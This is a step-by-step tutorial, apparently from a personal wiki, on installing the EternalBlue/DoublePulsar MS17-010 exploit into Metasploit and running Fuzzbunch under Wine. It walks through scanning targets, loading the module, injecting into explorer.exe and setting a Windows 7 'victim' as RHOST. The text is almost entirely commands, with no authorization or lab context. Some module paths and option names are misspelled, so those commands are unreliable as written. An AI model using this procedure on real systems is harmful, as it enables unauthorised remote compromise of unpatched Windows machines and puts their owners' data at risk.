#+TITLE: Eternalblue Doublepulsar
#+INCLUDE: "../header.org"
#+AUTHOR: David Johnson
#+SETUPFILE: "../org-html-themes/org/theme-readtheorg-local-1.setup"
#+INDEX: Eternalblue Doublepulsar
#+INDEX: Windows!Clients!EternalBlue DoublePulsar

This tutorial will cover how to add Eternalblue-Doublepulsar to Metasploit framework on any Debian based distro. As well as run the Fuzzbunch framework through wine.

* Prerequisites

- Debian based distro

- Metasploit

- Wine

- Eternalbule-doublepulsar

* Step 1:
** Will the target fall victim?
We will want to check to see if the target victim is vulnerable. To do this we will need to add a module to Metasploit. Specifically we want ms_17_010 which we can find on exploit db. Download the file and move it into Metasploits scanner module.

#+BEGIN_EXAMPLE
cp *.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/smb/smb_ms_17_010.rb
#+END_EXAMPLE

Now start up Metasploit and lets test everything out.

#+BEGIN_EXAMPLE
msfconsole
#+END_EXAMPLE

Let's make sure our new module loaded.

#+BEGIN_EXAMPLE
reload_all
#+END_EXAMPLE

Now use the module by entering the following.

#+BEGIN_EXAMPLE
use auxiliary/scanner/smb/smb_ms_17_010
#+END_EXAMPLE

There will be a few requirements for this to work. To list them all enter the following.

#+BEGIN_EXAMPLE
show options
#+END_EXAMPLE

or 

#+BEGIN_EXAMPLE
options
#+END_EXAMPLE

Here we really just need to set the value of RHOSTS.

#+BEGIN_EXAMPLE
set RHOSTS <IP address or addresses>
#+END_EXAMPLE

If the machine is likely vulnerable you will see something like this.

#+BEGIN_EXAMPLE
[!] 192.168.0.100:445         -Host is likely VULNERABLE to MS17-010!
#+END_EXAMPLE

* Step 2:
** Clone Eternalblue-Doublepulsar-Metasploit
The next step it to clone Eternalblue-Doublepulsar-Metasploit from github. We can add it to Metasploits path like we did before by adding directly to Metasploit. However here we will add it the prefered way.

Metasploit prefers external modules to be placed in .msf4/modules found in your root directory. We will need to make a few directories for our purpose such as exploits/windows.

Clone Enternalblue-Doublepulsar-Metasploit into this directory.

#+BEGIN_EXAMPLE
git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit.git
#+END_EXAMPLE

Change into Eternalblue-Doublepulsar-Metasploit.

#+BEGIN_EXAMPLE
cd Eternalblue-Doublepulsar-Metasploit
#+END_EXAMPLE

Now copy eternalblue_doublepulsar.rb to the appropriate directory.

#+BEGIN_EXAMPLE
cp eternalblue_doublepulsar.rb /root/.msf4/modules/exploits/windows/smb/
#+END_EXAMPLE

* Step 3:
We need to install wine because Fuzzbunch was written for Windows.

As always we begin with update

#+BEGIN_EXAMPLE
apt update
#+END_EXAMPLE

Install Wine and other Wine tools

#+BEGIN_EXAMPLE
apt install wine winbind winetricks
#+END_EXAMPLE

We need to add x32 because fuzzbunch was written for Windows Xp.

#+BEGIN_EXAMPLE
dpkg --add-architecture i386
#+END_EXAMPLE

Update and install Wine32

#+BEGIN_EXAMPLE
apt-get update && apt-get install wine32
#+END_EXAMPLE

Set Path variable.

#+BEGIN_EXAMPLE
WINEPREFIX="$HOME/.wine"
#+END_EXAMPLE

Set Wine Architecture

#+BEGIN_EXAMPLE
WINEARCH=win32 wine wineboot
#+END_EXAMPLE

Add to bashrc

#+BEGIN_EXAMPLE
echo "export WINEPREFIX=$HOME/.wine" >> ~/.bashrc
#+END_EXAMPLE

* Step 4:
** Exploit
With everything setup its time to exploit our victim. Begin by starting Metasploit.

#+BEGIN_EXAMPLE
msfconsole
#+END_EXAMPLE

Use our new module. Pro tip Tab is your friend.

#+BEGIN_EXAMPLE
use exploit/windows/Enternalblur-Doublepulsar-Metasploit/Enternalblur-Doublepulsar/
#+END_EXAMPLE

We will need to set the path to Doublepulsar and Eternalblue.

#+BEGIN_EXAMPLE
set DOUBLEPULSAR ~/.msf4/modules/exploits/windows/Enternalblur-Doublepulsar-Metasploit/deps
#+END_EXAMPLE

#+BEGIN_EXAMPLE
set ETERNALBLUE ~/.msf4/modules/exploits/windows/Enternalblur-Doublepulsar-Metasploit/deps
#+END_EXAMPLE

I recommend setting the process injection to explorer.exe

#+BEGIN_EXAMPLE
set PORCESSINJECT explorer.exe
#+END_EXAMPLE

Set RHOST to the victim's IPaddress.

#+BEGIN_EXAMPLE
set RHOST <>
#+END_EXAMPLE

We want to make sure we are targeting the right version of Windows.

#+BEGIN_EXAMPLE
show target
#+END_EXAMPLE

We are attacking Windows 7 so enter the appropriate corresponding number

#+BEGIN_EXAMPLE
set target <>
#+END_EXAMPLE

* references

https://www.youtube.com/watch?v=fWwXjXexlT8

https://github.com/mdiazcl/fuzzbunch-debian

https://www.exploit-db.com/exploits/41891/

https://www.youtube.com/watch?v=wDAkiXxm1gE

https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit

https://www.youtube.com/watch?v=mJWMqLF00fM
